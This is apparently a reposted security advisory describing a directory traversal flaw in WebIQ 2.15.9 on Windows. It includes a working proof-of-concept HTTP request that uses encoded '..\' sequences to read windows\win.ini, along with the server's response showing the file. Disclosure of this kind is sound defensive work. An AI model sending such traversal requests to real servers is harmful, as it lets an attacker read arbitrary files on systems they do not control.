The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.Request:GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 Host: 10.10.50.42:10123 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Connection: close Cache-Control: max-age=0 Response:HTTP/1.1 200 OK Connection: close Cache-Control: public, max-age=60 Content-Type: image/svg+xml Date: Thu, 20 Jun 2024 21:30:21 GMT Last-Modified: Fri, 10 Jul 2015 11:02:40 GMT ETag: 1436526092 Content-Length: 92 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
This Cyber News was published on www.tenable.com. Publication date: Sun, 15 Sep 2024 09:01:02 +0000